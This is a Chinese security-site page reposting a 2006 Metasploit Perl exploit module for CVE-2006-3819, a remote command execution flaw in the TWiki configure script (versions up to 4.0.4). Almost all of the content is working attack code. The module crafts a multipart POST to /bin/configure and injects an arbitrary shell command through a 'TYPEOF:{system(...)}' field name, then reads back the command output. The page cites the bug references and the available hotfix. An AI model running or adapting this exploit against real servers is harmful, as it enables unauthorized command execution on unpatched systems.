首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TWiki <= 4.0.4 (Configure Script) Remote Code Execution Exploit (meta)
来源:metasploit.com 作者:David 发布时间:2006-08-03  

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::twiki_config_typeof;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = {
'HttpBoundary' => ['Mtb06z', 'HTTP boundary']
};

my $info = {
'Name' => 'Twiki Configure script TYPEOF Parameter Remote Command Execution',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'David Maciejak <david dot maciejak at gmail dot com>' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'DIR' => [1, 'DATA', 'Directory of Twiki', '/twiki'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits an arbitrary command execution vulnerability in the
Twiki configure script. All versions of Twiki prior to
4.0.4 hotfix 2 are vulnerable. Patch HotFix04x00x04x02 is available on twiki.org homepage.
}),
'Refs' =>
[
['BID', '19188'],
['CVE', '2006-3819'],
['OSVDB', '27556'],
],

'Payload' =>
{
'Space' => 128,
'Keys' => ['cmd','cmd_bash'],
},

'Keys' => ['twiki'],

'DisclosureDate' => 'Jul 27 2006',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->VHost;
my $target_port = $self->GetVar('RPORT');
my $dir = $self->GetVar('DIR');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $cmd = $encodedPayload->RawPayload;
my $boundary = $self->GetLocal('HttpBoundary');

$cmd=
"\r\n--".$boundary."\r\n".
"Content-Disposition: form-data; name=\"action\"\r\n\r\n".
"update\r\n".
"--".$boundary.
"Content-Disposition: form-data; name=\"TYPEOF:{system('$cmd')}\"\r\n\r\n".
"BOOLEAN\r\n".
"--".$boundary;

my $proto="http";
if ($self->GetVar('SSL'))
{
$proto.="s";
}

my $request =
"POST ".$dir."/bin/configure HTTP/1.1\r\n".
"Content-Type: multipart/form-data; boundary=".$boundary."\r\n".
"User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.31-grsec i686)\r\n".
"Host: $target_host\r\n".
"Referer: ".$proto."://".$target_host.$dir."/bin/configure\r\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/png\r\n".
"Accept-Language: en\r\n".
"Content-Length: ". length($cmd). "\r\n\r\n".
$cmd;

my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}

$s->Send($request);

my $results = $s->Recv(-1, 200);

if ($results=~ /^transfer-encoding:[ \t]*chunked\b/im){
my @extract_result;
my @results = split ( /\r\n/, $results );

chomp @results;
my $fill_extract_result=0;
my $end_break=0;
my $i=0;
while ( !$end_break && ($i < @results)){
if ($results[$i] =~ /\<div id=\"patternScreen\"\>/)
{
$fill_extract_result=0;
$end_break=1;
}
if ($fill_extract_result>0) {
push(@extract_result,$results[$i]);
}
if ($results[$i] =~ /\<body class=\"patternNoViewPage\"\>/)
{
$fill_extract_result=1;
}
$i++;
}

if (@extract_result < 3) {
$self->PrintLine("[*] Target may be not vulnerable, or you have used ';' char in CMD");
}
else {
for ($i=1;$i<@extract_result;$i+=2) {
chomp @extract_result;
$self->PrintLine("$extract_result[$i]");
}
}
}

$s->Close();
return;
}

sub VHost {
my $self = shift;
my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST');
return $name;
}

1;




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mac OS X <= 10.4.7 fetchmai
·Mac OS X <= 10.3.8 (CF_CHAR
·Mac OS X <= 10.4.7 fetchmai
·SendCard <= 3.4.0 Unauthori
·Mac OS X <= 10.4.7 fetchmai
·XChat <= 2.6.7 (Windows Ver
·XMB <= 1.9.6 (u2uid) Remote
·myBloggie <= 2.1.4 (trackba
·Open Cubic Player <= 2.6.0p
·eIQnetworks License Manager Re
·ATutor <= 1.5.3.1 (links) R
·PHP <= 4.4.3 / 5.1.4 (objIn
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved